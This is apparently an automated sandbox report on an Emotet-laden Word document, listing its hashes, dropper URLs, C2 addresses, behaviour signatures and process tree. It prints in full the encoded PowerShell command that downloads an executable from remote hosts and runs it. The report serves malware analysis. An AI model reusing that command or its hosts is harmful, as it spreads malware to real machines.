Analysis

  • max time kernel
    28s
  • max time network
    22s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    28-07-2020 19:20

General

  • Target

    7a48ef5810768af153b1896c2a773acf048513a0fd1df2984cc6347c4b071192.doc

  • Size

    170KB

  • MD5

    611e1fde7d6a044d9fab66ad6d63bda0

  • SHA1

    eae24ec7f4cc756cbbcdecfebe0b73ce84350024

  • SHA256

    7a48ef5810768af153b1896c2a773acf048513a0fd1df2984cc6347c4b071192

  • SHA512

    e28bd6171fed93bf8eeb4b895aa0a42d46fb6be10f00ff9fda7003e301e90c95313bbbd1a476e0b73bf24e82bd961b3487a536197acd38fb4a6ed447716aee9d

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://megasolucoesti.com/css/8xbi/

exe.dropper

https://matuteroofing.com/j-folder/2ZdI48222/

exe.dropper

http://mediainmedia.com/upload/xtmvg46/

exe.dropper

http://mgregoire.net/cgi-bin/095d075/

exe.dropper

http://www.mobialive.com/onlineshopping/XLccr/

Extracted

Family

emotet

C2

179.60.229.168:443

185.94.252.13:443

189.218.165.63:80

77.90.136.129:8080

217.199.160.224:7080

104.131.41.185:8080

2.47.112.152:80

185.94.252.27:443

186.250.52.226:8080

51.255.165.160:8080

68.183.170.114:8080

191.99.160.58:80

104.131.103.37:8080

181.31.211.181:80

202.62.39.111:80

83.169.21.32:7080

87.106.46.107:8080

72.47.248.48:7080

177.75.143.112:443

190.17.195.202:80

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 1 IoCs

    Detects Emotet payload in memory.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Modifies registry class 280 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7a48ef5810768af153b1896c2a773acf048513a0fd1df2984cc6347c4b071192.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:240
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABNAFMASQBYAEMAbAB2AGMAPQAnAE0AVABXAEUAQwBnAHMAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABjAFUAcgBpAFQAeQBQAFIAYABPAFQATwBgAEMAYABPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABBAEYASABGAEcAdgBxAGgAIAA9ACAAJwAzADAAMQAnADsAJABDAFMAWABNAEwAdwBqAHoAPQAnAEIARwBKAFUAWgBtAGMAcAAnADsAJABPAFQATABSAEQAdQBmAHEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEARgBIAEYARwB2AHEAaAArACcALgBlAHgAZQAnADsAJABSAFEAWgBXAEEAYQB0AHcAPQAnAFYAQwBCAE4AVQBuAGgAZQAnADsAJABFAEMAUABSAE8AdQBhAGEAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQB0AC4AVwBlAEIAQwBMAGkARQBuAHQAOwAkAFUAVwBTAFIAQgB0AGoAZgA9ACcAaAB0AHQAcAA6AC8ALwBtAGUAZwBhAHMAbwBsAHUAYwBvAGUAcwB0AGkALgBjAG8AbQAvAGMAcwBzAC8AOAB4AGIAaQAvACoAaAB0AHQAcABzADoALwAvAG0AYQB0AHUAdABlAHIAbwBvAGYAaQBuAGcALgBjAG8AbQAvAGoALQBmAG8AbABkAGUAcgAvADIAWgBkAEkANAA4ADIAMgAyAC8AKgBoAHQAdABwADoALwAvAG0AZQBkAGkAYQBpAG4AbQBlAGQAaQBhAC4AYwBvAG0ALwB1AHAAbABvAGEAZAAvAHgAdABtAHYAZwA0ADYALwAqAGgAdAB0AHAAOgAvAC8AbQBnAHIAZQBnAG8AaQByAGUALgBuAGUAdAAvAGMAZwBpAC0AYgBpAG4ALwAwADkANQBkADAANwA1AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbQBvAGIAaQBhAGwAaQB2AGUALgBjAG8AbQAvAG8AbgBsAGkAbgBlAHMAaABvAHAAcABpAG4AZwAvAFgATABjAGMAcgAvACcALgAiAFMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATwBHAFgAQgBTAG0AdgBhAD0AJwBDAFoAWABTAEEAcgB6AHYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEgATgBGAEsARwBrAG8AaQAgAGkAbgAgACQAVQBXAFMAUgBCAHQAagBmACkAewB0AHIAeQB7ACQARQBDAFAAUgBPAHUAYQBhAC4AIgBEAE8AdwBuAGAATABgAE8AQQBEAEYASQBsAEUAIgAoACQASABOAEYASwBHAGsAbwBpACwAIAAkAE8AVABMAFIARAB1AGYAcQApADsAJABKAEcAUwBYAFQAbwB1AG4APQAnAFkATwBNAFYATQB1AGgAbgAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAE8AVABMAFIARAB1AGYAcQApAC4AIgBMAGAARQBuAEcAVABoACIAIAAtAGcAZQAgADIANgA3ADgANQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBSAGAARQBhAFQARQAiACgAJABPAFQATABSAEQAdQBmAHEAKQA7ACQAUABZAE4AQgBBAG0AcQB3AD0AJwBDAEMASwBOAFkAeAB4AHkAJwA7AGIAcgBlAGEAawA7ACQAUgBOAEkARwBGAHAAdwBsAD0AJwBIAE0AQwBMAE0AaQBlAGYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwBGAFIASwBDAHMAcQBrAD0AJwBPAEEATgBZAFAAdwB1AHcAJwA=
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Process spawned unexpected child process
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    PID:1400
  • C:\Users\Admin\301.exe
    C:\Users\Admin\301.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    PID:1848
    • C:\Windows\SysWOW64\LocationApi\sdbinst.exe
      "C:\Windows\SysWOW64\LocationApi\sdbinst.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:1956

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\301.exe

  • C:\Users\Admin\301.exe

  • C:\Windows\SysWOW64\LocationApi\sdbinst.exe

  • memory/240-8-0x0000000006DF0000-0x0000000006FF0000-memory.dmp

    Filesize

    2.0MB

  • memory/240-6-0x000000000BE50000-0x000000000BE54000-memory.dmp

    Filesize

    16KB

  • memory/240-7-0x0000000006DF0000-0x0000000006FF0000-memory.dmp

    Filesize

    2.0MB

  • memory/240-2-0x0000000008950000-0x0000000008954000-memory.dmp

    Filesize

    16KB

  • memory/240-9-0x0000000002010000-0x0000000002011000-memory.dmp

    Filesize

    4KB

  • memory/240-5-0x000000000ADD0000-0x000000000ADD4000-memory.dmp

    Filesize

    16KB

  • memory/240-4-0x0000000006DF0000-0x0000000006FF0000-memory.dmp

    Filesize

    2.0MB

  • memory/240-3-0x0000000006DF0000-0x0000000006FF0000-memory.dmp

    Filesize

    2.0MB

  • memory/1848-11-0x00000000002E0000-0x00000000002EC000-memory.dmp

    Filesize

    48KB

  • memory/1956-13-0x0000000000000000-mapping.dmp